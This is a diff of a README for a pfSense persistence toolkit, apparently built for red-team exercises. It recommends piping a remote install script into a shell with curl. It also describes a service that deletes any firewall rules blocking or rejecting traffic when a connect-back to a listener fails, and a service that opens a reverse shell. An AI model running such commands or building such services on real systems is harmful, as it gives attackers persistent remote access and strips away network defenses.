cjc1294/pfSensePersistence/README.md

 Recommend to pipe directly to shell, ie ```curl -s <IP>:8000/install.sh | sh```

 ## Breakout
 Service that will check if it can connect back to the listener periodically.
-If it can't, it will delete any filter rules blocking traffic to the red team network
+If it can't, it will delete any filter rules that block or reject traffic

 ## Service Shell
 Basic service to make a reverse shell